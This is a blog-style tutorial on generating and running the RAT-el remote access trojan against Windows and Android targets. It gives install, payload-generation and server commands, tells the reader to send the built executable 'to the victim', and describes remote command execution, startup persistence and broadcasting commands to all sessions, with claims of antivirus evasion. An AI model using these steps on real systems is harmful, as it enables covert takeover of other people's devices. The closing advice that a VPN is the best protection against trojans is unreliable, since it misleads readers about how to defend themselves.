Remote Access Trojan (Rat) for android and windows 2022 latest

Hello everyone. In this article, we will discuss another penetration testing tool known as “RAT-el.” RAT-el is a free and open-source penetration testing program that lets you make Remote Access Trojan (Rat) and take control of a Windows PC or android device. It operates on a client-server model, with the server sending commands and the client executing them and sending the results back to the server. Anti-virus software has no way of detecting the client.

Introduction – What is a remote access trojan?

Dependencies

As is customary, we must first install several prerequisites before installing this utility.
 
command – $sudo aptget install git python3 python3pip mingww64
 
 
 
 
 
 
 
 
 
 
 
1
2
3
cd RATel/setup
pip3 install r requirement.txt

Setup Client

We’ll have to go back to the tool’s main directory. You must now modify the IP address, port number, and name of this tool to suit your needs.

 
 
 
 
 
1
2
cd RATel
python3 RATelGenerator.py port 12345 ip 192.168.1.12 name ratel.exe password kingboy12

The payload will be saved in the “payload” directory once it has been constructed. You can now send it to the victim via any online or offline service.

 
 
 
 
 
1
cd payload/

Windows Defender

Alright πŸ˜› !! Look at below, windows defender security is enabled.

 

Server Setup

Return to your primary Kali linux machine and configure the server to capture the client session. When the victim clicks on the malicious client service, the connection is now formed.

 
 
 
 
 
1
2
cd RATel/server
python3 RATelServer.py port 12345 password kingboy12 time 5 clean

We have no idea what exactly we need to do after getting the session, so we will execute the β€œ-h” command to see all the commands.

List Session

You can see all established sessions by using the β€œ-ls” command.

Usage πŸ˜› β€“target < ID >

 

Execute Command

 Using the, we can now run all of the commands associated with the cmd prompt on the target system. by using 

β€œ-c” parameter.

Activate CMD Prompt

Also you can activate CMD prompt by executing the following command.

Persistence

The persistence module is loaded during Windows startup which we can also create.

Broadcast

It also contains a function that allows us to broadcast any message to all valid sessions at the same time. We have disseminated the message of opening the file explorer in each system, as shown in the figure below.

 
 
 
 
 
1
2
broadcast
c “explorer.exe”

BOOM πŸ˜› !! As you can see the file explorer prompt is activated in every system which means it works perfectly.

 

The Best Way to Protect Yourself from Rats & Keep Data Secure!

The Remote Access Trojan is a type of malware that allows hackers to remotely access your computer. to protect yourself from this type of malware and keep your data secure from rats never download apps, software, scripts and etc from unsafe sites.

The best way to protect yourself from remote access Trojan is to use a VPN. VPNs are an excellent way to protect your data and keep it secure from rats.

Conclusion: How to Prevent Rats from Leaking Your Data or Hijacking Your Device?

In the digital era, we need to be more aware and cautious of the threats that come with it. We need to make sure that we are not vulnerable in any way. The two ways of preventing rats from leaking your data or hijacking your device are:

  • Be aware of what you share online and offline
  • Use a VPN (Virtual Private Network)

You May Also Like:-

hosting a site on deep web free and legally

Cross Site Request Forgery CSRF full guide

How to dump a database of a website free 2021

The Complete Easy Guide to Hacking for Beginners

Types of Hackers and What They Steal

The Complete Guide to Bug Bounty Hunting 2022

Leave a Reply

Your email address will not be published.